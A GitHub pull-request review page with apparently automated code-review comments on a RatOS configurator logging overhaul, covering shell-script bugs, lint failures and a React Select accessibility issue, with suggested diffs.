src/server/routers/logs.ts (1)
  • LogEntry (65-65)
src/scripts/generate-mock-logs.js (1)
  • LOG_LEVELS (12-19)
configuration/scripts/beacon-update.sh (2)
configuration/scripts/ratos-logging.sh (7)
  • setup_error_trap (619-627)
  • log_script_start (652-662)
  • get_timestamp (110-113)
  • log_error (458-458)
  • log_info (456-456)
  • create_log_summary (677-694)
  • log_script_complete (665-674)
configuration/scripts/ratos-common.sh (1)
  • update_beacon_fw (44-72)
🪛 GitHub Actions: Linter: shellcheck
configuration/scripts/ratos-logging-config.sh

[error] 1-1: Not executable: '../RatOS-configurator/configuration/scripts/ratos-logging-config.sh'. Please fix permissions (chmod +x). Step: Run './configuration/scripts/ensure-executable-scripts.sh'.

configuration/scripts/ratos-log-rotation.sh

[error] 1-1: Not executable: '../RatOS-configurator/configuration/scripts/ratos-log-rotation.sh'. Please fix permissions (chmod +x). Step: Run './configuration/scripts/ensure-executable-scripts.sh'.

🪛 Biome (2.1.2)
src/app/logs/_components/log-summary-header.tsx

[error] 193-193: This hook is being called conditionally, but all hooks must be called in the exact same order in every component render.

For React to preserve state between calls, hooks needs to be called unconditionally and always in the same order.
See https://reactjs.org/docs/hooks-rules.html#only-call-hooks-at-the-top-level

(lint/correctness/useHookAtTopLevel)

🪛 markdownlint-cli2 (0.17.2)
LOGGING_SYSTEM.md

64-64: Trailing punctuation in heading
Punctuation: ':'

(MD026, no-trailing-punctuation)


93-93: Trailing punctuation in heading
Punctuation: ':'

(MD026, no-trailing-punctuation)


134-134: Trailing punctuation in heading
Punctuation: ':'

(MD026, no-trailing-punctuation)


142-142: Trailing punctuation in heading
Punctuation: ':'

(MD026, no-trailing-punctuation)

Comment on lines +115 to 117
echo "Loading environment from $envFile"
load_env "$envFile"
fi
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

⚠️ Potential issue

Write log lines to stderr to avoid breaking scripts that source this file

This script is commonly sourced; emitting to stdout can pollute/corrupt caller output (e.g., JSON, CLI piping). Redirect to stderr and prefer printf for portability.

Apply this diff:

-	echo "Loading environment from $envFile"
+	printf '[env] Loading environment from %s\n' "$envFile" >&2
📝 Committable suggestion

‼️ IMPORTANT
Carefully review the code before committing. Ensure that it accurately replaces the highlighted code, contains no missing lines, and has no issues with indentation. Thoroughly test & benchmark the code to ensure it meets the requirements.

Suggested change
echo "Loading environment from $envFile"
load_env "$envFile"
fi
printf '[env] Loading environment from %s\n' "$envFile" >&2
load_env "$envFile"
fi
🤖 Prompt for AI Agents
In configuration/scripts/environment.sh around lines 115 to 117, the script
prints "Loading environment from $envFile" to stdout which can corrupt output
when the file is sourced; change the echo to a stderr-prefixed, portable printf
call (e.g., printf '%s\n' "Loading environment from $envFile" >&2) so log lines
go to stderr, and leave the load_env call unchanged.

Comment on lines +119 to 121
echo "Loading environment from $userEnvFile"
load_env "$userEnvFile"
fi
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

⚠️ Potential issue

Same here: redirect user env load message to stderr

Keep output clean for callers; use printf and stderr.

Apply this diff:

-	echo "Loading environment from $userEnvFile"
+	printf '[env] Loading environment from %s\n' "$userEnvFile" >&2
📝 Committable suggestion

‼️ IMPORTANT
Carefully review the code before committing. Ensure that it accurately replaces the highlighted code, contains no missing lines, and has no issues with indentation. Thoroughly test & benchmark the code to ensure it meets the requirements.

Suggested change
echo "Loading environment from $userEnvFile"
load_env "$userEnvFile"
fi
printf '[env] Loading environment from %s\n' "$userEnvFile" >&2
load_env "$userEnvFile"
fi
🤖 Prompt for AI Agents
In configuration/scripts/environment.sh around lines 119 to 121, the
informational echo "Loading environment from $userEnvFile" should be written to
stderr using printf; replace the echo with a printf that formats the filename
and redirects to stderr (e.g. printf 'Loading environment from %s\n'
"$userEnvFile" >&2) and leave the subsequent load_env call unchanged so callers'
stdout remains clean.

Comment on lines +21 to +26
if ensure_moonraker_policiykit_rules; then
log_info "Moonraker PolicyKit rules ensured successfully" "main"
else
log_error "Failed to ensure Moonraker PolicyKit rules" "main" "POLICYKIT_RULES_FAILED"
exit_code=1
fi
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

🛠️ Refactor suggestion

🧩 Analysis chain

Typo in function name should be fixed

The function name ensure_moonraker_policiykit_rules contains a typo ("policiy" should be "policy"). This should be corrected in the source file moonraker-ensure-policykit-rules.sh.

Let me verify if this typo exists in the source file:


🏁 Script executed:

#!/bin/bash
# Check if the typo exists in the function definition
rg -n "ensure_moonraker_policiykit_rules" configuration/scripts/

Length of output: 186


Rename function ensure_moonraker_policiykit_rulesensure_moonraker_policykit_rules

Fix the typo ("policiy" → "policy") in the function name and update the definition and all callers:

  • configuration/scripts/moonraker-ensure-policykit-rules.sh:11 (definition)
  • configuration/scripts/moonraker-update.sh:21 (call)
🤖 Prompt for AI Agents
In configuration/scripts/moonraker-update.sh around lines 21 to 26 the function
name is misspelled as ensure_moonraker_policiykit_rules; rename it to
ensure_moonraker_policykit_rules and update its definition in
configuration/scripts/moonraker-ensure-policykit-rules.sh at line 11 to match,
then update all callers (including the call in moonraker-update.sh) to use the
corrected name so the script invokes the defined function.

Comment on lines +9 to +12
RATOS_LOGGING_CONFIG_FILE="${RATOS_PRINTER_DATA_DIR:-"~"}/ratos-logging.conf"
RATOS_LOGGING_CONFIG_DIR="$(dirname "$RATOS_LOGGING_CONFIG_FILE")"
RATOS_LOG_FILE=${RATOS_LOG_FILE:-"${RATOS_PRINTER_DATA_DIR:-"~"}/logs/ratos-configurator.log"}

Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

⚠️ Potential issue

Bug: "" is quoted and will not expand; creates literal “” dirs/files.

Defaults should use $HOME (expanded), not "~". Current code can create ./~ and ./~/logs unexpectedly.

-RATOS_LOGGING_CONFIG_FILE="${RATOS_PRINTER_DATA_DIR:-"~"}/ratos-logging.conf"
-RATOS_LOGGING_CONFIG_DIR="$(dirname "$RATOS_LOGGING_CONFIG_FILE")"
-RATOS_LOG_FILE=${RATOS_LOG_FILE:-"${RATOS_PRINTER_DATA_DIR:-"~"}/logs/ratos-configurator.log"}
+RATOS_LOGGING_CONFIG_FILE="${RATOS_PRINTER_DATA_DIR:-${HOME}}/ratos-logging.conf"
+RATOS_LOGGING_CONFIG_DIR="$(dirname "$RATOS_LOGGING_CONFIG_FILE")"
+RATOS_LOG_FILE=${RATOS_LOG_FILE:-"${RATOS_PRINTER_DATA_DIR:-${HOME}}/logs/ratos-configurator.log"}
📝 Committable suggestion

‼️ IMPORTANT
Carefully review the code before committing. Ensure that it accurately replaces the highlighted code, contains no missing lines, and has no issues with indentation. Thoroughly test & benchmark the code to ensure it meets the requirements.

Suggested change
RATOS_LOGGING_CONFIG_FILE="${RATOS_PRINTER_DATA_DIR:-"~"}/ratos-logging.conf"
RATOS_LOGGING_CONFIG_DIR="$(dirname "$RATOS_LOGGING_CONFIG_FILE")"
RATOS_LOG_FILE=${RATOS_LOG_FILE:-"${RATOS_PRINTER_DATA_DIR:-"~"}/logs/ratos-configurator.log"}
RATOS_LOGGING_CONFIG_FILE="${RATOS_PRINTER_DATA_DIR:-${HOME}}/ratos-logging.conf"
RATOS_LOGGING_CONFIG_DIR="$(dirname "$RATOS_LOGGING_CONFIG_FILE")"
RATOS_LOG_FILE=${RATOS_LOG_FILE:-"${RATOS_PRINTER_DATA_DIR:-${HOME}}/logs/ratos-configurator.log"}
🤖 Prompt for AI Agents
In configuration/scripts/ratos-logging-config.sh around lines 9 to 12, the
default literal "~" is quoted and will not expand, producing paths like ./~ and
./~/logs; change the defaults to use the expanded $HOME instead (e.g. use
${RATOS_PRINTER_DATA_DIR:-"$HOME"} for RATOS_LOGGING_CONFIG_FILE and
${RATOS_PRINTER_DATA_DIR:-"$HOME"}/logs for RATOS_LOG_FILE) so dirname and
subsequent file paths operate on an actual home directory path.

Comment on lines +278 to +287
if [[ $LOG_ROTATION_AVAILABLE == true ]]; then
# Convert RATOS_LOG_MAX_SIZE to size format expected by rotation script
local max_size_str="${RATOS_LOG_MAX_SIZE}"
if [[ $RATOS_LOG_MAX_SIZE -gt 0 ]]; then
# Convert bytes to MB for readability
max_size_str="$((RATOS_LOG_MAX_SIZE / 1024 / 1024))M"
fi

rotate_log_file "$RATOS_LOG_FILE" "$max_size_str" "$RATOS_LOG_BACKUP_COUNT" "true"
return $?
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

⚠️ Potential issue

Do not downscale byte threshold to MB; it breaks small limits.

Dividing bytes to MB can yield 0M for values <1MiB, disabling rotation unintentionally. Pass bytes as-is and let the rotation script parse numeric bytes.

-        local max_size_str="${RATOS_LOG_MAX_SIZE}"
-        if [[ $RATOS_LOG_MAX_SIZE -gt 0 ]]; then
-            # Convert bytes to MB for readability
-            max_size_str="$((RATOS_LOG_MAX_SIZE / 1024 / 1024))M"
-        fi
-
-        rotate_log_file "$RATOS_LOG_FILE" "$max_size_str" "$RATOS_LOG_BACKUP_COUNT" "true"
+        rotate_log_file "$RATOS_LOG_FILE" "$RATOS_LOG_MAX_SIZE" "$RATOS_LOG_BACKUP_COUNT" "true"
📝 Committable suggestion

‼️ IMPORTANT
Carefully review the code before committing. Ensure that it accurately replaces the highlighted code, contains no missing lines, and has no issues with indentation. Thoroughly test & benchmark the code to ensure it meets the requirements.

Suggested change
if [[ $LOG_ROTATION_AVAILABLE == true ]]; then
# Convert RATOS_LOG_MAX_SIZE to size format expected by rotation script
local max_size_str="${RATOS_LOG_MAX_SIZE}"
if [[ $RATOS_LOG_MAX_SIZE -gt 0 ]]; then
# Convert bytes to MB for readability
max_size_str="$((RATOS_LOG_MAX_SIZE / 1024 / 1024))M"
fi
rotate_log_file "$RATOS_LOG_FILE" "$max_size_str" "$RATOS_LOG_BACKUP_COUNT" "true"
return $?
if [[ $LOG_ROTATION_AVAILABLE == true ]]; then
rotate_log_file "$RATOS_LOG_FILE" "$RATOS_LOG_MAX_SIZE" "$RATOS_LOG_BACKUP_COUNT" "true"
return $?
🤖 Prompt for AI Agents
In configuration/scripts/ratos-logging.sh around lines 278 to 287, the code
converts RATOS_LOG_MAX_SIZE from bytes to megabytes which turns values under
1MiB into "0M" and disables rotation; instead stop downscaling—pass the original
byte value (as a plain number or string representing bytes) to rotate_log_file
so the rotation script can parse numeric bytes itself; remove the division-to-M
conversion and ensure max_size_str is set to RATOS_LOG_MAX_SIZE when greater
than zero.

Comment on lines 110 to +113
const SelectItem = React.forwardRef<
React.ElementRef<typeof SelectPrimitive.Item>,
React.ComponentPropsWithoutRef<typeof SelectPrimitive.Item>
>(({ className, children, ...props }, ref) => (
React.ComponentPropsWithoutRef<typeof SelectPrimitive.Item> & { fullElement?: boolean }
>(({ className, children, fullElement, ...props }, ref) => (
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

⚠️ Potential issue

🧩 Analysis chain

fullElement branch drops ItemText; breaks typeahead/a11y

Radix Select relies on ItemText for label/typeahead. Rendering a plain div removes that. Use ItemText asChild to keep semantics.

Apply:

- {fullElement ? (
-   <div className="flex-1">{children}</div>
- ) : (
-   <SelectPrimitive.ItemText className="flex-1">{children}</SelectPrimitive.ItemText>
- )}
+ {fullElement ? (
+   <SelectPrimitive.ItemText asChild>
+     <div className="flex-1">{children}</div>
+   </SelectPrimitive.ItemText>
+ ) : (
+   <SelectPrimitive.ItemText className="flex-1">{children}</SelectPrimitive.ItemText>
+ )}

Please keyboard-test typeahead after the change.

Also applies to: 127-131


🏁 Script executed:

#!/bin/bash
set -euo pipefail
echo "PWD: $(pwd)"
echo "Searching repo for Select-related identifiers..."
rg -n --hidden -S "SelectPrimitive\.ItemText|SelectPrimitive\.Item|const SelectItem\b|fullElement\b|asChild\b|ItemText\b" || true

echo
echo "Showing contextual matches (up to 8 lines) for 'fullElement' and 'ItemText'..."
rg -n -C8 --hidden -S "fullElement|ItemText" || true

echo
echo "Attempting to locate likely select component files (select.tsx / select/index.tsx / src/components/ui/select.tsx)..."
rg -n --hidden -S "select\.tsx|select/index\.tsx|src/components/ui/select\.tsx" || true

# If a select.tsx file exists, print first 240 lines for inspection
select_files="$(rg --hidden --files | rg -i 'select(\.tsx|/index\.tsx|/select\.tsx)?' || true)"
if [ -n "$select_files" ]; then
  echo
  echo "Candidate files found:"
  echo "$select_files"
  echo
  for f in $select_files; do
    echo "---- $f (first 240 lines) ----"
    sed -n '1,240p' "$f" || true
    echo
  done
else
  echo "No obvious select.tsx files matched filename patterns; listing files that contain 'SelectPrimitive' or 'SelectItem' for manual inspection..."
  rg -n --hidden -S "SelectPrimitive|SelectItem" || true
fi

Length of output: 43924


fullElement branch drops ItemText; breaks typeahead/a11y

Radix Select needs SelectPrimitive.ItemText for the accessible label/typeahead; the current fullElement branch renders a plain div and removes that semantics.

Location: src/components/ui/select.tsx (around lines 127–131)

Apply:

- {fullElement ? (
-   <div className="flex-1">{children}</div>
- ) : (
-   <SelectPrimitive.ItemText className="flex-1">{children}</SelectPrimitive.ItemText>
- )}
+ {fullElement ? (
+   <SelectPrimitive.ItemText asChild>
+     <div className="flex-1">{children}</div>
+   </SelectPrimitive.ItemText>
+ ) : (
+   <SelectPrimitive.ItemText className="flex-1">{children}</SelectPrimitive.ItemText>
+ )}

Keyboard-test typeahead after the change.

📝 Committable suggestion

‼️ IMPORTANT
Carefully review the code before committing. Ensure that it accurately replaces the highlighted code, contains no missing lines, and has no issues with indentation. Thoroughly test & benchmark the code to ensure it meets the requirements.

Suggested change
const SelectItem = React.forwardRef<
React.ElementRef<typeof SelectPrimitive.Item>,
React.ComponentPropsWithoutRef<typeof SelectPrimitive.Item>
>(({ className, children, ...props }, ref) => (
React.ComponentPropsWithoutRef<typeof SelectPrimitive.Item> & { fullElement?: boolean }
>(({ className, children, fullElement, ...props }, ref) => (
const SelectItem = React.forwardRef<
React.ElementRef<typeof SelectPrimitive.Item>,
React.ComponentPropsWithoutRef<typeof SelectPrimitive.Item> & { fullElement?: boolean }
>(({ className, children, fullElement, ...props }, ref) => (
<SelectPrimitive.Item ref={ref} className={className} {...props}>
{fullElement ? (
<SelectPrimitive.ItemText asChild>
<div className="flex-1">{children}</div>
</SelectPrimitive.ItemText>
) : (
<SelectPrimitive.ItemText className="flex-1">{children}</SelectPrimitive.ItemText>
)}
</SelectPrimitive.Item>
));
🤖 Prompt for AI Agents
In src/components/ui/select.tsx around lines 110–113, the fullElement branch
currently replaces SelectPrimitive.ItemText with a plain div, breaking typeahead
and a11y; restore the semantics by rendering SelectPrimitive.ItemText (wrapping
the visible children or text) inside the fullElement branch instead of a plain
div so the Item retains its accessible label/typeahead behavior, and keep any
styling by applying the same className to the ItemText or a surrounding element
as needed; after the change validate keyboard typeahead works.

Comment on lines 86 to +90
if [ -f "${SERVICE_FILE}" ]; then
if [ "$(md5sum "${SERVICE_FILE_TEMPLATE}")" != "$(md5sum "${SERVICE_FILE}")" ]; then
sudo mv /tmp/ratos-configurator.service "${SERVICE_FILE}"
sudo systemctl daemon-reload
echo "Service file updated!"
if declare -f execute_with_logging >/dev/null 2>&1; then
if execute_with_logging "install_or_update_service_file" "SERVICE_UPDATE_FAILED" sudo mv /tmp/ratos-configurator.service "${SERVICE_FILE}"; then
if execute_with_logging "install_or_update_service_file" "SYSTEMCTL_RELOAD_FAILED" sudo systemctl daemon-reload; then
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

⚠️ Potential issue

Fix service change detection: compare against processed file, not the raw template.

Comparing ${SERVICE_FILE_TEMPLATE} to ${SERVICE_FILE} will almost always differ because the installed unit contains substitutions. Compare the processed /tmp/ratos-configurator.service instead to avoid unnecessary reloads/restarts.

Apply:

-    if [ "$(md5sum "${SERVICE_FILE_TEMPLATE}")" != "$(md5sum "${SERVICE_FILE}")" ]; then
+    if [ "$(md5sum /tmp/ratos-configurator.service | awk '{print $1}')" != "$(md5sum "${SERVICE_FILE}" | awk '{print $1}')" ]; then
📝 Committable suggestion

‼️ IMPORTANT
Carefully review the code before committing. Ensure that it accurately replaces the highlighted code, contains no missing lines, and has no issues with indentation. Thoroughly test & benchmark the code to ensure it meets the requirements.

Suggested change
if [ -f "${SERVICE_FILE}" ]; then
if [ "$(md5sum "${SERVICE_FILE_TEMPLATE}")" != "$(md5sum "${SERVICE_FILE}")" ]; then
sudo mv /tmp/ratos-configurator.service "${SERVICE_FILE}"
sudo systemctl daemon-reload
echo "Service file updated!"
if declare -f execute_with_logging >/dev/null 2>&1; then
if execute_with_logging "install_or_update_service_file" "SERVICE_UPDATE_FAILED" sudo mv /tmp/ratos-configurator.service "${SERVICE_FILE}"; then
if execute_with_logging "install_or_update_service_file" "SYSTEMCTL_RELOAD_FAILED" sudo systemctl daemon-reload; then
if [ -f "${SERVICE_FILE}" ]; then
if [ "$(md5sum /tmp/ratos-configurator.service | awk '{print $1}')" != "$(md5sum "${SERVICE_FILE}" | awk '{print $1}')" ]; then
if declare -f execute_with_logging >/dev/null 2>&1; then
if execute_with_logging "install_or_update_service_file" "SERVICE_UPDATE_FAILED" sudo mv /tmp/ratos-configurator.service "${SERVICE_FILE}"; then
if execute_with_logging "install_or_update_service_file" "SYSTEMCTL_RELOAD_FAILED" sudo systemctl daemon-reload; then
🤖 Prompt for AI Agents
In src/scripts/common.sh around lines 86 to 90, the script currently compares
md5sum of the raw template (${SERVICE_FILE_TEMPLATE}) to the installed unit,
which will differ after template substitutions; update the comparison to use the
processed temp unit (e.g. /tmp/ratos-configurator.service or whatever variable
holds the processed file) instead of the raw template, and ensure the processed
file exists before computing its md5sum; replace the md5sum left-hand operand
with the processed file path, keep the right-hand operand as the installed
${SERVICE_FILE}, and retain the guarded execute_with_logging/mv and systemctl
calls.

Comment on lines +6 to +9
# Source the logging library
# shellcheck source=../../configuration/scripts/ratos-logging.sh
source "$BASE_DIR/configuration/scripts/ratos-logging.sh"

Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

⚠️ Potential issue

BASE_DIR may be unset here; guard before sourcing logging.

setup.sh uses $BASE_DIR to source ratos-logging.sh but relies on common.sh to define it. Add a fallback to prevent sourcing from /configuration/... when BASE_DIR is empty.

-# shellcheck source=../../configuration/scripts/ratos-logging.sh
-source "$BASE_DIR/configuration/scripts/ratos-logging.sh"
+# shellcheck source=../../configuration/scripts/ratos-logging.sh
+: "${BASE_DIR:=$(cd "$SCRIPT_DIR/.." && pwd -P)}"
+source "$BASE_DIR/configuration/scripts/ratos-logging.sh"
📝 Committable suggestion

‼️ IMPORTANT
Carefully review the code before committing. Ensure that it accurately replaces the highlighted code, contains no missing lines, and has no issues with indentation. Thoroughly test & benchmark the code to ensure it meets the requirements.

Suggested change
# Source the logging library
# shellcheck source=../../configuration/scripts/ratos-logging.sh
source "$BASE_DIR/configuration/scripts/ratos-logging.sh"
# Source the logging library
# shellcheck source=../../configuration/scripts/ratos-logging.sh
: "${BASE_DIR:=$(cd "$SCRIPT_DIR/.." && pwd -P)}"
source "$BASE_DIR/configuration/scripts/ratos-logging.sh"
🤖 Prompt for AI Agents
In src/scripts/setup.sh around lines 6-9, the script unconditionally sources
"$BASE_DIR/configuration/scripts/ratos-logging.sh" but BASE_DIR may be unset;
add a guard before sourcing: check if BASE_DIR is empty or unset and either set
a safe default (e.g. compute BASE_DIR relative to the script directory, such as
two levels up from the script) or exit with a clear error, then source using the
validated/quoted BASE_DIR; this prevents accidentally sourcing
"/configuration/..." when BASE_DIR is empty.

Comment on lines 14 to 23
verify_ready()
{
log_info "Verifying script execution requirements" "verify_ready"
if [ "$EUID" -eq 0 ]; then
echo "This script must not run as root"
log_error "Script attempted to run as root" "verify_ready" "ROOT_EXECUTION_DENIED"
exit 1
fi
log_info "Script execution requirements verified" "verify_ready"
}
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

⚠️ Potential issue

Don’t exit inside a step; return and let the orchestrator handle summary/logging.

exit 1 aborts the script and skips create_log_summary/log_script_complete. Use return 1 and keep fail-fast semantics at the caller if desired.

-        exit 1
+        return 1

If you want to fail fast, check return and exit immediately in the main block right after verify_ready.

🤖 Prompt for AI Agents
In src/scripts/setup.sh around lines 14 to 23, the verify_ready function calls
exit 1 when detecting root execution which aborts the whole script and prevents
downstream summary/logging; change the function to return 1 instead of exiting
so callers can decide fail-fast behavior, and update any places that call
verify_ready in the main block to check its return value and call exit if
immediate termination is desired (i.e., if ! verify_ready; then exit 1; fi),
preserving current logging behavior inside verify_ready.

Comment on lines +269 to +270
const { generateMockLogs } = await import('@/scripts/generate-mock-update-logs');
await generateMockLogs();
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

⚠️ Potential issue

🧩 Analysis chain

Verify dynamic import path for mock data generator

The dynamic import uses a relative path that may not work correctly in production builds.


🏁 Script executed:

#!/bin/bash
# Check if the mock data generator file exists and verify the import path
fd -t f "generate-mock-update-logs" --exec ls -la {}
# Check for any build/dist artifacts that might affect the import path
fd -t d "dist|build" -d 2 | head -5

Length of output: 91


Use a runtime-resolvable import instead of the '@' alias

src/server/routers/logs.ts (lines 269–270): confirmed src/scripts/generate-mock-update-logs.ts exists; import('@/scripts/generate-mock-update-logs') relies on a TypeScript path alias that likely won't resolve at runtime — replace with a relative import ('../../scripts/generate-mock-update-logs') or ensure your build/runtime resolves the '@' alias.

🤖 Prompt for AI Agents
In src/server/routers/logs.ts around lines 269-270, the dynamic import uses the
TypeScript '@' path alias (import('@/scripts/generate-mock-update-logs')), which
may not resolve at runtime; replace it with a runtime-resolvable relative import
import('../../scripts/generate-mock-update-logs') (from src/server/routers to
src/scripts) or alternatively ensure your build/runtime is configured to resolve
the '@' alias so the dynamic import works in production.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

2 participants